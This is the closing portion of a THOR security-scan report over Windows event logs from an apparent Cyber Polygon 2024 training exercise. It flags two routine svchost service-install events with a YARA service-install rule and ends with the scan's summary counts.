{"_index": "cyberpolygon2024-mercurylark-win", "_id": "1WnKt5EBNKI3r7qcapQH", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.386Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\twebthreatdefusersvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p\n\tService Type: \t\t0xE0\n\tService Start Type:\t2\n\tService Account: \t\tLocalSystem"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "pc00025", "os": {"name": "Windows 11 Pro", "platform": "windows", "version": "10.0", "build": "22631.4037", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "f[...]_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p", "ServiceName": "webthreatdefusersvc_1b457e39", "ClientProcessId": "2932", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ParentProcessId": "648", "ServiceStartType": "2", "SubjectUserName": "PC00025$"}, "record_id": 195209, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 10
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "2GnKt5EBNKI3r7qcapMD", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.360Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tDeviceAssociationBrokerSvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"name": "pc00025", "os": {"platform": "windows", "name": "Windows 11 Pro", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "w[...]": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p", "ServiceName": "DeviceAssociationBrokerSvc_1b457e39", "ClientProcessId": "2932", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ParentProcessId": "648", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195195, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 11
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Rule triggered more than 10 times in the current element. Future matches will be suppressed. To show all matches use --showall.
Notice 12
Sep 10 18:29:12 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Report
MESSAGE:
Thor Scan finished
END_TIME:
Tue Sep 10 18:29:12 2024
ALERTS:
0
WARNINGS:
18
NOTICES:
11
ERRORS:
0